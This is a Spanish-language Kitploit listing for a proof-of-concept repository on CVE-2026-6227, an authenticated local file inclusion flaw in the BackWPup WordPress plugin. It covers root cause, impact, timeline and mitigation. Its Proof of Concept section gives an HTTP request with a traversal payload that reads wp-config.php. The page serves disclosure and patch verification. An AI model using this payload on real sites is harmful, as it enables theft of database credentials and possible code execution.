Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-6227 — Prueba de concepto educativa para CVE-2026-6227, una inclusión local de archivos autenticada en el plugin de WordPress BackWPup, que incluye análisis de causa raíz, solicitud de explotación y orientación de mitigación. | Kitploit
Herramientas/GitHubGitHub/pixel-defaultbr/cve-2026-6227
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPapers e InvestigaciónAprendizaje y Educación
GitHubpixel-defaultbr/cve-2026-6227

CVE-2026-6227

Prueba de concepto educativa para CVE-2026-6227, una inclusión local de archivos autenticada en el plugin de WordPress BackWPup, que incluye análisis de causa raíz, solicitud de explotación y orientación de mitigación.

Ver Repositorio
hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-6227: Inclusión de Archivos Locales en BackWPup

CVSS Version Researcher

Resumen del Aviso

Las versiones de BackWPup hasta la 5.6.6 inclusive están afectadas por una vulnerabilidad de Inclusión de Archivos Locales (LFI) autenticada a través del parámetro block_name del endpoint REST /wp-json/backwpup/v1/getblock.

El fallo fue causado por una sanitización no recursiva con str_replace() de secuencias de traversal y ya está corregido en la versión 5.6.7.

Metadatos

  • CVE: CVE-2026-6227
  • Severidad: Alta
  • Puntuación CVSS: 7.2
  • Producto Afectado: Plugin de WordPress BackWPup
  • Versiones Afectadas: <= 5.6.6
  • Versión Corregida: 5.6.7
  • Estado: Parcheado
  • Fecha de Divulgación: 2026-04-13
  • Investigador: Pixel_DefaultBR
  • Aviso Legal

    Este repositorio es estrictamente para fines educativos y de investigación ética en seguridad. La información aquí proporcionada tiene como objetivo ayudar a administradores y equipos de seguridad a verificar sus sistemas. No utilice esto contra objetivos sin permiso explícito y por escrito.

    Superficie Afectada

    • Función: BackWPupHelpers::component()
    • Endpoint: POST /wp-json/backwpup/v1/getblock
    • Parámetro: block_name
    • Nivel de Acceso: Administrador autenticado (o usuarios con permisos de copia de seguridad delegados)

    Análisis de la Causa Raíz

    El cargador de componentes vulnerable aplica una sanitización no recursiva con str_replace() antes de invocar include(). Esto puede ser evadido utilizando patrones de traversal manipulados como ....// o ..././, permitiendo la resolución de rutas controlada por el atacante.

    Impacto

    • Inclusión arbitraria de archivos PHP locales desde el sistema de archivos del servidor
    • Posible exposición de datos sensibles (por ejemplo, wp-config.php)
    • Posible ejecución remota de código en configuraciones específicas de servidor/aplicación

    Por defecto, la explotación requiere acceso a nivel de administrador. Si los permisos de copia de seguridad están delegados, los usuarios con privilegios reducidos también podrían explotar este problema.

    Requisitos Previos de Explotación

    • Sesión de WordPress autenticada válida
    • Nonce REST válido
    • Privilegios de administrador o permisos de copia de seguridad delegados

    Prueba de Concepto

    Escenario: Inclusión de Archivos Locales

    1. Inicie sesión en WordPress con una cuenta que tenga la capacidad de trabajo de BackWPup.
    2. Active una solicitud normal desde la interfaz del plugin e intercepte el tráfico con un proxy.
    3. Localice una solicitud POST legítima a /wp-json/backwpup/v1/getblock.
    4. Reemplace block_name con un payload de traversal.

    Ejemplo de solicitud:

    root@kitploit:~
    POST /wp-json/backwpup/v1/getblock HTTP/1.1
    Host: target.example.com
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-WP-Nonce: <your_nonce_here>
    Cookie: wordpress_logged_in_<hash>=<your_session_cookie>
    
    block_name=....//....//....//....//wp-config&block_type=component&block_data%5Btype%5D=success&block_data%5Bfont%5D=small&block_data%5Bdismiss_icon%5D=true&block_data%5Bcontent%5D=You+scheduled+a+new+backup+successfully!
    
    1. Observe la respuesta para verificar el comportamiento de inclusión de archivos.

    Cronología

    • 2026-03: Vulnerabilidad reportada al proveedor
    • 2026-03-25: Parche del proveedor publicado en 5.6.7
    • 2026-04-13: Divulgación pública (CVE-2026-6227)

    Mitigación

    • Actualice BackWPup a la versión 5.6.7 o posterior
    • Restrinja la asignación de la capacidad backwpup solo a roles de confianza
    • Revise los registros de auditoría para detectar accesos sospechosos a /wp-json/backwpup/v1/getblock

    Referencias

    • Página del plugin del proveedor: https://wordpress.org/plugins/backwpup/
    • Referencia CVE (Wordfence): https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backwpup/backwpup-566-authenticated-administrator-local-file-inclusion-via-block-name-parameter
    Descargar herramienta